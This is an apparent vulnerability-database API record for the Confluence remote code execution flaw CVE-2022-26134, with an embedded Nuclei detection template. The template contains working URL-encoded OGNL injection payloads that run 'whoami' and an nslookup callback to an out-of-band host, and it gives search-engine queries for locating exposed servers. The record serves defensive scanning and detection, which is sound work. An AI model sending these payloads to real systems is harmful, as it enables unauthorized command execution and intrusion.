{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-26134/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-26134/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-26134/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-26134/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-26134/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-26134"},"sightings":{"href":"/api/v1/sightings/cve-2022-26134"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-26134.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2022-26134\n\ninfo:\n  name: Confluence - Remote Code Execution\n  author: pdteam,jbertman\n  severity: critical\n  description: |\n    Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n  remediation: |\n    Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability.\n  reference:\n    - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis\n    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\n    - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/\n    - https://jira.atlassian.com/browse/CONFSERVER-79016\n    - http://packetstormsecurity.com/files/167431/Through-The-Wire-CVE-2022-26134-Confluence-Proof-Of-Concept.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-26134\n    cwe-id: CWE-917\n    epss-score: 0.99999\n    epss-percentile: 0.99993\n    cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: atlassian\n    product: confluence_data_center\n    shodan-query:\n      - http.component:\"Atlassian Confluence\"\n      - http.component:\"atlassian confluence\"\n    fofa-query: app=\"atlassian-confluence\"\n  tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/\"\n      - \"{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/\"\n\n    stop-at-first-match: true\n\n    matchers-condition: or\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(to_lower(header_1), \"x-cmd-response:\")'\n\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'contains(to_lower(response_2), \"confluence\")'\n        condition: and\n\n    extractors:\n      - type: kval\n        kval:\n          - \"x_cmd_response\"\n        part: header\n# digest: 490a00463044022066734d343116b5daae6edd6ecca05217c838545e3e44140c36984f641c8949e802207335637f554e93c8c3fb5d126f2c21c38fd475d9c0264e2c5802b953df3ae222:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2022-26134"}